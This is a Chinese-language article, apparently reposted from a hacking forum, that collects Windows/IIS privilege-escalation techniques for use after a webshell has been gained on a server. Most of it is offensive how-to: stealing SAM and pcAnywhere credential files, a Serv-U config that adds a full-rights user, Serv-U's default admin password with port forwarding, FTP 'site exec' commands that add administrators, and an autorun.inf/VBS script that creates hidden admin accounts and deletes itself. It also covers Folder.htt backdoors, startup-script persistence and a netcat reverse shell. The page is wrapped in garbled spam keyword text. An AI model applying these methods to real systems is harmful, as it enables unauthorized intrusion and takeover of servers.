国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

最全的Webshell提權(quán)方法總結(jié)

安全 應(yīng)用安全
在得到了一個Webshell之后,如果能進一步利用系統(tǒng)的配置不當取得更高的權(quán)限,一直是廣大黑友們所津津樂道的話題,也是高手和菜鳥間最大的區(qū)別。本文將從一個大角度總括當前流行的各種提權(quán)方法,希望對大家有所啟發(fā),起到一個拋磚引玉的作用。

在得到了一個Webshell之后,如果能進一步利用系統(tǒng)的配置不當取得更高的權(quán)限,一直是廣大黑友們所津津樂道的話題,也是高手和菜鳥間最大的區(qū)別。本文將從一個大角度總括當前流行的各種提權(quán)方法,希望對大家有所啟發(fā),起到一個拋磚引玉的作用。

WEBSHELL權(quán)限提升技巧 
c: d: e:..... 
C:\Documents and Settings\All Users\「開始」菜單\程序\ 
看這里能不能跳轉(zhuǎn),我們從這里可以獲取好多有用的信息比如Serv-U的路徑, 
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 
看能否跳轉(zhuǎn)到這個目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸 
c:\Program Files\serv-u\ 
C:\WINNT\system32\config\ 
下它的SAM,破解密碼 
c:\winnt\system32\inetsrv\data\ 
是erveryone 完全控制,很多時候沒作限制,把提升權(quán)限的工具上傳上去,然后執(zhí)行 
c:\prel 
C:\Program Files\Java Web Start\ 
c:\Documents and Settings\ 
C:\Documents and Settings\All Users\ 
c:\winnt\system32\inetsrv\data\ 
c:\Program Files\ 
c:\Program Files\serv-u\ BBS.bitsCN.com國內(nèi)最早的網(wǎng)管論壇 
C:\Program Files\Microsoft SQL Server\ 
c:\Temp\ 
c:\mysql\(如果服務(wù)器支持PHP) 
c:\PHP(如果服務(wù)器支持PHP) 
運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權(quán)限 
還可以用這段代碼試提升,好象不是很理想的 
如果主機設(shè)置很變態(tài),可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs等木馬。 
根目錄下隱藏autorun.inf 
C:\PROGRAM FILES\KV2004\ 綁 
D:\PROGRAM FILES\RISING\RAV\ 
C:\Program Files\Real\RealServer\ 
rar 
Folder.htt與desktop.ini 
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下 
replace 替換法 捆綁 
腳本 編寫一個啟動/關(guān)機腳本 重起 
刪SAM :( 錯 
CAcls命令 
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak 
Ring的權(quán)限提升21大法! 
以下全部是本人提權(quán)時候的總結(jié) 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過 
的。本人不才,除了第一種方法自己研究的,其他的都是別人的經(jīng)驗總結(jié)。希望對朋友有幫助! 

1.radmin連接法 
條件是你權(quán)限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去  。本人從來米成功過,端口到是給對方打開了。

2.paanywhere 
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF 
文件,在本地安裝pcanywhere上去 

3.SAM破解 
C:\WINNT\system32\config\ 下他的SAM 破解之 

4.SU密碼奪取 
C:\Documents and Settings\All Users\「開始」菜單\程序\ 
引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉(zhuǎn) 
進去后,如果有權(quán)限修改ServUDaemon.ini,加個用戶上去,密碼為空 
[USER=WekweN|1] 
Password= 
HomeDir=c:\ 
TimeOut=600 
Maintenance=System 
Access1=C:\|RWAMELCDP 
Access1=d:\|RWAMELCDP 
Access1=f:\|RWAMELCDP 
SKEYvalues= 
這個用戶具有最高權(quán)限,然后我們就可以ftp上去 quote site exec xxx 來提升權(quán)限 

5.c:\winnt\system32\inetsrv\data\ 
引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權(quán)限的工具上傳上去, 
然后執(zhí)行 

6.SU溢出提權(quán) 
這個網(wǎng)上教程N多 不詳細講解了 

7.運行Csript 
引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提 
升權(quán)限 
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps 
查看有特權(quán)的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 
再將asp.dll加入特權(quán)一族 
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣) 
我們現(xiàn)在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" 
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" 
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 
\inetsrv\asp.dll" 
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

8.腳本提權(quán) 
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs 

9.VNC 
這個是小花的文章 HOHO 
默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password 

我們可以用vncx4 
破解它,vncx4使用很簡單,只要在命令行下輸入 
c:\>vncx4 -W 
然后順序輸入上面的每一個十六進制數(shù)據(jù),沒輸完一個回車一次就行了。

10.NC提權(quán) 
給對方來個NC 但是條件是你要有足夠的運行權(quán)限 然后把它反彈到自己的電腦上 HOHO OK了 

11.社會工程學之GUEST提權(quán) 
很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵 
箱號 手機號 盡量看看 HOHO 

12.IPC空連接 
如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令 

13.替換服務(wù) 
這個不用說了吧?個人感覺相當復(fù)雜 

14.autorun .inf 
autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統(tǒng)、隱藏屬性 傳到哪個盤都可以的 不相信 
他不運行 

15.desktop.ini與Folder.htt 
引用:首先,我們現(xiàn)在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇"自定義 
文件夾"(xp好像是不行的)一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder 
setting的文件架與desktop.ini的文件,(如果你看不到,先取消"隱藏受保護的操作系統(tǒng)文件")然后 
我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼: ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后門文件名"> 
然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方 
任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執(zhí)行了我們的后門 

16.su覆蓋提權(quán) 
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重 
起一下Serv-U,于是你上面的所有配置都與他的一模一樣了 

17.SU轉(zhuǎn)發(fā)端口 
43958這個是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執(zhí)行命令: Fpipe –v –l 3333 –r 
43958 127.0.0.1 意思是將4444端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個 
服務(wù)器,IP填對方IP,帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上后你就可以管理他的 
Serv-u了 

18.SQL帳戶密碼泄露 
如果對方開了MSSQL服務(wù)器,我們就可以通過用SQL連接器加管理員帳號(可以從他的連接數(shù)據(jù)庫的 
ASP文件中看到),因為MSSQL是默認的SYSTEM權(quán)限。 
引用:對方?jīng)]有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass DL.bitsCN.com網(wǎng)管軟件下載 
中填入你所得到的用戶名與密碼。format選擇xp_cmdshell"%s"即可。然后點擊connect,連接上后就可 
以在CMD一欄中輸入你想要的CMD命令了 

19.asp.dll 
引用:因為asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定相同 

我們現(xiàn)在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" 
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" 
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 
\inetsrv\asp.dll" 
好了,現(xiàn)在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去 
了,注意,用法中的get和set,一個是查看一個是設(shè)置.還有就是你運行上面的你要到 
C:\Inetpub\AdminScripts>這個目錄下. 
那么如果你是一個管理員,你的機子被人用這招把asp提升為system權(quán)限,那么,這時,防的方法就是把 
asp.dll T出特權(quán)一族,也就是用set這個命令,覆蓋掉剛才的那些東東. 

20.Magic Winmail 
前提是你要有個webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587這里去看吧 

21.DBO…… 
其實 提升權(quán)限的方式很多的 就看大家怎么利用了 HOHO 加油吧 將服務(wù)器控制到底! 
感謝noangel 
WEBSHELL權(quán)限提升 
動網(wǎng)上傳漏洞,相信大家拿下不少肉雞吧,但是都是WEBSHELL,不能拿到系統(tǒng)權(quán)限,要如何拿到系統(tǒng)權(quán)限呢?這正是我們這次要討論的內(nèi)容 
OK,進入我的WEBSHELL 
啊哈,不錯,雙CPU,速度應(yīng)該跟的上,不拿下你我怎么甘心啊 
輸入密碼,進入到里面看看,有什么好東西沒有,翻了下,好像也沒有什么特別的東西,看看能不能進到其他的盤符,點了下C盤,不錯不錯,可以進去,這樣提升就大有希望了

一 serv-u提升 
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,記得有次看到SERV-U有默認的用戶名和密碼,但是監(jiān)聽的端口是43958,而且是只有本地才能訪問的,但是我們有端口轉(zhuǎn)發(fā)工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21 
顯示竟然是3.0的,唉,不得不說這個管理員真的不稱職。后來完畢后掃描了下,也只有FTP的洞沒有補。既然是這樣,我們就開始我們的提升權(quán)限了 
上傳FPIPE,端口轉(zhuǎn)發(fā)工具, 圖三 
在運行CMD命令里輸入d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機的43598端口轉(zhuǎn)發(fā)到81端口 

然后打開我們自己機子上的SERV-U,點Serv-U服務(wù)器,點菜單欄上的的服務(wù)器,點新建服務(wù)器,然后輸入IP,輸入端口,記得端口是剛剛我們轉(zhuǎn)發(fā)的 81端口。服務(wù)名稱隨便你喜歡,怎么樣都行。然后是用戶名:LocalAdministrator 密碼:#l@$ak#.lk;0@P (密碼都是字母) 
確定,然后點剛剛建的服務(wù)器,然后就可以看到已有的用戶,自己新建一個用戶,把所有權(quán)限加上。也不鎖定根目錄 
接下來就是登陸了,登陸FTP一定要在CMD下登陸, 
進入后一般命令和DOS一樣,添加用戶的時候 
ftp>quote site exec net.exe user hk pass /add 
ftp>quote site exec net.exe localgroup administrators hk/add 
如果對方開了3389的話,就不用我教你怎么做了,沒開的話,新建立IPC連接,在上傳木馬或者是開啟3389的工具 
二 
auto.ini 加 SHELL.VBS 
autorun.inf 
[autorun] 
open=shell.vbs 
shell.vbs 
dim wsh 
set wsh=createObject("WScript.Shell") 
wsh.run "net user guest /active:yes",0 
wsh.run "net user guest 520ls",0 
wsh.run "net localgroup administrators guest /add",0 
wsh.run "net user hkbme 520ls /add",0 


wsh.run "net localgroup administrators hkbme /add",0 
wsh.run "cmd.exe /c del autorun.inf",0 
wsh.run "cmd.exe /c del shell.vbs",0 

但是這樣要可以訪問到對方的根目錄。將這兩個文件放到對方硬盤的根目錄下。當然你也可以直接執(zhí)行木馬程序,還要一個木馬程序,但是語句就和最后兩句一樣,通過CMD執(zhí)行木馬程序 

三 
Folder.htt與desktop.ini 
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下,覺得一個不夠,可以多放幾個 
Folder.htt添加代碼 
 
 
但是后門和這兩個文件必須要放到一塊,有點問題,可以結(jié)合啟動VBS,運行結(jié)束后,刪除上傳的后門.就是CODEBASE="shell.vbs".shell寫法如上 

四 
replace 
替換法,可以替換正在執(zhí)行的文件。用這個幾乎可以馬上得到權(quán)限,但是我沒有做過試驗,可以試下,將對方正在執(zhí)行的文件替換為和它文件名一樣的,捆綁了木馬的。為什么不直接替換木馬呢?如果替換的是關(guān)鍵程序,那不是就直接掛了?所以還是捆綁好點 www.bitsCN.net網(wǎng)管博客等你來搏
格式 
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] 
[/R] [/W] 
REPLACE [drive1:][path1]filename [drive2:][path2] 
[/R] [/S] [/W] 
 [drive1:][path1]filename 指定源文件。 
 [drive2:][path2] 指定要替換文件的 
  目錄。 
 /A 把新文件加入目標目錄。不能和 
  /S 或 /U 命令行開關(guān)搭配使用。 
 /P 替換文件或加入源文件之前會先提示您 
  進行確認。 
 /R 替換只讀文件以及未受保護的 
  文件。 
 /S 替換目標目錄中所有子目錄的文件。 
  不能與 /A 命令選項 
  搭配使用。 
 /W 等您插入磁盤以后再運行。 
 /U 只會替換或更新比源文件日期早的文件。 
  不能與 /A 命令行開關(guān)搭配使用 
這個命令沒有試驗過,看能不能替換不能訪問的文件夾下的文件,大家可以試驗下 

五 
腳本 
編寫一個啟動/關(guān)機腳本配置文件scripts.ini,這個文件名是固定的,不能改變。內(nèi)容如下: 
[Startup] 


0CmdLine=a.bat 
0Parameters= 
將文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts" 
A.BAT的內(nèi)容可以是NET USER yonghu mima 
也可以是NET USER ADMINistrator XXX 
這樣可以恢復(fù)你想要得任意用戶名的密碼,也可以自己增加新的用戶,但是要依賴重啟,還有就是對SYSTEM32有寫的權(quán)限

六 
SAM 
如果可以訪問對方的SYSTEM32的話,刪除對方的SAM文件,等他重啟以后就是ADMIN用戶密碼為空 
突然又有了想法,可以用REPLACE命令替換的嗎,可以把你的SAM文件提取出來,上傳到他的任意目錄下,然后替換。不過不知道如果對SYSTEM32沒有權(quán)限訪問的話,能不能實現(xiàn)替換。

【編輯推薦】

  1. 黑客網(wǎng)絡(luò)入侵大型網(wǎng)站的完整思路
  2. php注入后的提權(quán)
責任編輯:Oo小孩兒 來源: 安全中國網(wǎng)
相關(guān)推薦

2023-06-11 17:24:26

2019-12-01 22:34:42

提權(quán)web安全漏洞

2016-12-12 09:11:20

2022-03-10 09:41:15

漏洞Linux內(nèi)核

2011-03-07 11:36:23

FileZillaSe

2013-10-18 10:10:45

Linux漏洞代碼提權(quán)

2021-01-13 08:14:36

Windows提權(quán)漏洞攻擊

2021-01-06 08:04:30

Linux方式提權(quán)

2013-11-29 15:34:00

2021-05-01 20:52:30

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2015-09-22 10:25:13

2010-11-02 21:17:17

2015-03-13 10:06:55

2024-07-31 08:46:10

2017-03-25 20:30:15

2012-11-15 13:44:36

Plesk密碼提權(quán)密碼

2024-01-15 00:25:59

2009-07-25 17:24:45

2018-07-05 10:44:09

Windows提權(quán)漏洞

2009-08-07 10:18:13

Linux反彈CmdLine S技巧
點贊
收藏

51CTO技術(shù)棧公眾號

在线不卡免费av| 国产亚洲视频在线观看| 超碰成人在线免费观看| 欧美精品国产一区| 91国产中文字幕| 国产精品诱惑| 欧美一级二级三级乱码| 一级在线视频| 亚洲欧洲综合另类| 天堂在线一区二区| 国产精品高潮呻吟视频 | 国产suv精品一区二区6| 欧美午夜免费| 亚洲深夜影院| 精品国产免费久久久久久尖叫| 亚洲高清影视| 97超碰人人看人人| 国产精品久久观看| 亚洲最大福利视频| 精品69视频一区二区三区Q| 国产精品亚发布| 91精品推荐| 1卡2卡3卡精品视频| 欧美另类女人| 欧美国产综合视频| 蜜臀av一区二区在线免费观看| 欧美日韩一区在线播放| 国产香蕉久久精品综合网| 国产精品美女网站| 青青草国产免费一区二区下载| 91豆花精品一区| 综合亚洲自拍| 国产狼人综合免费视频| 99久久精品费精品国产| 国产精品乱码视频| 视频在线观看一区二区三区| 三年中国中文在线观看免费播放| 日韩免费视频播放| 91社区在线播放| 成年免费网站| 欧美午夜片欧美片在线观看| www.视频在线.com| 亚洲剧情一区二区| 91成人噜噜噜在线播放| 欧美一级电影久久| 综合久久亚洲| 欧美性大战久久久久| 久久精品国产在热久久| 美女av免费在线观看| 亚洲综合av网| 黄网av在线| 欧美激情按摩在线| 欧美日韩日本国产亚洲在线| 国产卡一卡二在线| **网站欧美大片在线观看| 精品av中文字幕在线毛片| 亚洲精品suv精品一区二区| 欧美黄视频在线观看| 国产在线观看精品一区二区三区| 久久www成人_看片免费不卡| 亚欧无线一线二线三线区别| 亚洲国产精品欧美一二99| av在线小说| 欧美中在线观看| 久久久精品午夜少妇| 欧美精品aaaa| 91精品国产色综合久久不卡电影| 四虎永久精品在线| 国产精品美女在线| 久久国产乱子精品免费女| 一道本在线免费视频| 91精品国产综合久久国产大片| 国产福利一区二区三区在线播放| 国产精品久久久久久久久免费| 全国精品久久少妇| 国产羞羞视频| 精品噜噜噜噜久久久久久久久试看 | 亚洲九九精品| 日本a视频在线观看| 欧美aa一级| 欧美一级二级三级蜜桃| 久久蜜桃精品| 欧美又粗又长又爽做受| 亚洲一区二区三区四区五区黄| 波多野结依一区| 欧亚精品在线观看| 三级一区在线视频先锋 | 日韩a级黄色片| 亚洲一级二级三级| 日韩高清av一区二区三区| 成人国内精品久久久久一区| 狠狠色狠狠色综合日日91app| 91精品国产综合久久精品| 成人在线精品| 国产乱子伦精品| 国产精品欧美一区二区三区| 麻豆精品视频在线观看| 国产欧美亚洲精品| 国产一区激情在线| 在线视频中文字幕| 色偷偷88888欧美精品久久久| 好吊视频一区二区三区四区| 欧美丰满熟妇xxxxx| 精品久久久久久久久久久久包黑料 | 亚洲mm色国产网站| 91美女视频网站| 免费黄色在线网站| 国产99视频精品免视看7| 国产一区二区在线看| 在线免费黄色| 国产成人精品综合久久久| 国产精品888| 国产精品久久久久久福利| 国产精品一香蕉国产线看观看| av一二三不卡影片| 神马久久午夜| 免费看成人午夜电影| 欧美日韩在线另类| 理论片一区二区在线| 成人网站免费观看入口| 亚洲福利视频久久| 亚洲永久免费精品| 久蕉在线视频| 成人黄色免费网站在线观看| 亚洲欧洲三级电影| 青草伊人久久| 精品无码国模私拍视频| 精品国产露脸精彩对白| 亚洲欧美视频| 香港伦理在线| 国产精品久久久久久免费观看 | 欧美亚洲国产一区二区三区va| 日韩超碰人人爽人人做人人添| 久久视频这里有精品| 亚洲人成电影在线| 国内精品久久久久影院一蜜桃| 丁香花视频在线观看| 欧美色图亚洲自拍| 精品久久久影院| 日韩成人精品在线| av中文资源在线资源免费观看| 天天综合色天天综合色hd| 欧美精品一级二级三级| 久久久人成影片免费观看| 美女的诞生在线观看高清免费完整版中文 | 欧美黑人巨大xxx极品| 成人avav影音| 国产一区二区三区四区五区3d| 日韩精品第1页| 日韩精品在线观看一区二区| 久久99久久久久| 外国成人直播| 无码播放一区二区三区| 久久久成人精品视频| 国产网站一区二区| 理论片一区二区在线| 性网站在线免费观看| 成人高清视频观看www| 日本久久电影网| 免播放器亚洲| 美女视频在线免费| 久久精品.com| 国产精品69久久久久| 色国产精品一区在线观看| 亚洲国产成人精品女人久久久| 国产成人免费av一区二区午夜| 欧美日韩精品综合| 欧美一卡二卡在线| 久久精品麻豆| 成人观看网址| 日韩极品视频在线观看| 欧美巨乳美女视频| 夜夜操天天操亚洲| 综合久久婷婷| 国产美女一区视频| 欧美在线一区视频| dj大片免费在线观看| 在线观看成人一级片| 亚洲视频一起| 超污网站在线观看| 成人精品视频.| 精品电影一区| 男人添女人下面高潮视频| 国产精品porn| 亚洲品质自拍视频网站| 欧洲激情综合| 人人做人人澡人人爽欧美| 国产精品九色蝌蚪自拍| 天天做天天爱天天综合网| 国产视频一区二区| 国产素人在线观看| 国产精品av在线播放| 欧美一区日韩一区| gogogo免费视频观看亚洲一| 国产99久久| 日韩av激情| 丁香婷婷激情| 亚洲欧洲国产精品久久| 91高清在线免费观看| 欧美一区二区三区视频在线 |